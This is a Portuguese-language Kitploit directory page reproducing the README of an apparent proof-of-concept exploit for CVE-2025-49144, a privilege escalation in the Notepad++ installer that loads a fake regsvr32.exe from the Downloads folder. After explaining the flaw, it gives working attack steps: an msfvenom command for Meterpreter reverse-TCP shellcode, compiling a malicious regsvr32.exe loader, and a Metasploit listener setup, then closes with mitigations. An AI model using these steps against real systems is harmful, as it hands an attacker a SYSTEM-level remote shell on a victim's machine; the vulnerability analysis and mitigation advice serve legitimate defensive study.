Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
notepad-v8.8.1-LPE-CVE- — CVE-2025-49144 * Notepad++ v8.8.1 * SYSTEM-level POC | Kitploit
Ferramentas/GitHubGitHub/assad12341/notepad-v8.8.1-lpe-cve-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoDesenvolvimento de PayloadsExploração de BináriosLabs e Prática
GitHubassad12341/notepad-v8.8.1-lpe-cve-

notepad-v8.8.1-LPE-CVE-

CVE-2025-49144 * Notepad++ v8.8.1 * SYSTEM-level POC

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

notepad-v8.8.1-LPE-CVE-

CVE-2025-49144 * Notepad++ v8.8.1 * POC de nível SYSTEM

image

📌 CVE-2025-49144 é uma vulnerabilidade de escalada de privilégio local de alta gravidade encontrada nos instaladores do Notepad++ v8.8.1 e versões anteriores. Esta vulnerabilidade decorre do comportamento de caminho de pesquisa de executável não controlado durante a instalação, permitindo que um atacante local obtenha privilégios de nível SYSTEM ao colocar executáveis maliciosos no mesmo diretório do instalador.

⚙️ Como o CVE funciona – Passo a Passo:

🧱 1. O que deu errado no instalador?

O instalador do Notepad++ (antes do v8.8.2) chama regsvr32.exe para registrar alguns componentes — mas faz isso sem fornecer o caminho completo (como C:\Windows\System32\regsvr32.exe).

Em vez disso, ele apenas executa:

root@kitploit:~
regsvr32.exe some_dll

📂 2. Comportamento do caminho de pesquisa do Windows: Quando um executável é iniciado sem um caminho completo, o Windows usa uma ordem de pesquisa específica para encontrar o arquivo:

  • A pasta a partir da qual o aplicativo foi iniciado (ex.: Downloads)
  • A pasta do sistema (System32)
  • A pasta do Windows
  • Diretório de trabalho atual
  • Caminhos na variável de ambiente PATH

Então, se um regsvr32.exe falso for colocado na mesma pasta que o instalador (ex.: Downloads), o Windows o usará antes do real.

💣 3. Exploração:

  • O atacante coloca um regsvr32.exe malicioso na mesma pasta que o instalador legítimo do Notepad++ (ex.: a pasta Downloads da vítima).
  • A vítima executa o instalador (pensando que é seguro).
  • O instalador chama regsvr32.exe, mas acaba executando o malicioso da mesma pasta — com privilégios de SYSTEM (porque os instaladores normalmente solicitam permissões de administrador).
  • O payload do atacante agora está sendo executado como NT AUTHORITY\SYSTEM.

⚙️ Passos para Reproduzir:

Obter shellcode:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt

Baixe o arquivo "regsvr32_loader.c" e edite-o. Cole todo o shellcode de shellcode.txt no comentário mencionado. Compile para regsvr32.exe:

root@kitploit:~
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows

Implante um ouvinte meterpreter:

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.9
set LPORT 4444
run

Baixe uma versão vulnerável do Notepad++, ou seja, anterior à 8.8.1, pois a 8.8.1 agora é atualizada automaticamente. Para o PoC, usei o Notepad++ v8.6.8 Mova o arquivo "regsvr32.exe" para o sistema Windows na mesma pasta do instalador do Notepad++, provavelmente na pasta Downloads. Conclua a instalação do instalador do Notepad++. Nota: Este é um PoC, portanto testado com o Windows Defender e a proteção em tempo real desabilitados.

✅ Mitigação

Usuários e administradores devem:

  • Atualizar para o Notepad++ v8.8.2 ou posterior
  • Restringir a instalação de software a administradores confiáveis
  • Usar AppLocker, WDAC ou Políticas de Restrição de Software (SRP) para:
    • Bloquear a execução de pastas graváveis pelo usuário (ex.: Downloads)
    • Impedir a execução de binários não confiáveis, como regsvr32.exe, de caminhos não autorizados
    • Aplicar assinatura de código para executáveis As equipes de segurança devem auditar regularmente os caminhos de instalação, monitorar as permissões de gravação e observar o comportamento durante a execução do instalador para reduzir a superfície de ataque.

🏷️ Licença Licença MIT — Gratuito apenas para fins educacionais, de pesquisa e defensivos.

🤝 Contribuindo Pull Requests são bem-vindos — melhore a detecção, adicione recursos ou sugira correções.

Baixar ferramenta